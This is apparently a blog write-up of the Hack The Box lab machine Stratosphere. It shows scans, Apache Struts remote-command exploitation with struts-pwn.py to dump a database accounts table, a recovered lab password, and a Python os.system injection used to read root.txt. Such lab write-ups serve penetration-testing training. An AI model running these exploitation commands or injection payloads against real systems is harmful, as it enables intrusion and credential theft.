Posts Tags Categories AboutMe

Stratosphere Box Writeup & Walkthrough – [HTB] – HackTheBox

 included in  categories HackTheBox Writeup
     405 words   2 minutes 
Stratosphere Box Writeup & Walkthrough – [HTB] – HackTheBox

This article demonstrates how to hack the Stratosphere box to gain both user.txt and root.txt files.

Stratosphere is a machine on the Hack The Box platform. Hack The Box is an online platform that allows you to test your penetration testing skills and exchange ideas and methodologies with others who have similar interests. It features a range of challenges that are constantly updated.

This writeup will guide you through hacking the Stratosphere box to obtain both user.txt and root.txt files.

We begin by scanning the open ports on the Stratosphere box to identify any vulnerable services.

Ports Scan
Ports Scan

We find that three ports are open: 22/TCP for SSH, 80/TCP for web services, and 8080/TCP, which is likely a Tomcat or WebLogic service.

The HTTP service is running on this box.

HTTP Service
HTTP Service

We use dirb to enumerate the website. Excitingly, we identify a sub-folder named “Monitoring”.

Website Enumeration
Website Enumeration

We navigate to the website at http://10.10.10.64/Monitoring/. This URL redirects us to the following:

http://10.10.10.64/Monitoring/example/Welcome.action

As you may know, the “.action” extension is associated with Apache Struts, which has several known vulnerabilities. We exploit these to execute commands on the server, manipulate local MySQL, and extract sensitive information from the database.

Bash

python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c \'"#!/bin/bash" > /tmp/1.sh'
python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c \'"mysql -u admin -p admin -D users << EOF" >> /tmp/1.sh'
python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c \'"select * from accounts;" >> /tmp/1.sh'
python struts-pwn.py --url http://10.10.10.64:80/Monitoring/example/Welcome.action -c 'EOF" >> /tmp/1.sh'

Following the execution of the above script (/tmp/1.sh), we obtain the following information:

Oracle Database Credential
Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard

Now, we have Richard’s password and can log into the server via SSH as Richard.

Stratosphere User.txt
Stratosphere User.txt

We proceed with privilege escalation. First, we check the sudo list to see what can be done with sudo.

Stratosphere Sudo
Stratosphere Sudo

Then, we review the above Python script.

Stratosphere Python Script
Stratosphere Python Script

It appears we need to crack the MD5 hash. However, there is an easier way.

We simply inject the following code, and then we retrieve root.txt:

Python

__import__('os').system('cat /root/root.txt')

Stratosphere Root.txt
Stratosphere Root.txt

This box is not overly complicated, but it is strict. Everything you need is right there; you just need to know what to do. Due to a poor network connection, I spent most of my time on the port scan and enumeration. Attacking the server only took a few hours.

Updated on 01-09-2018
 HackTheBoxWriteup
 | Home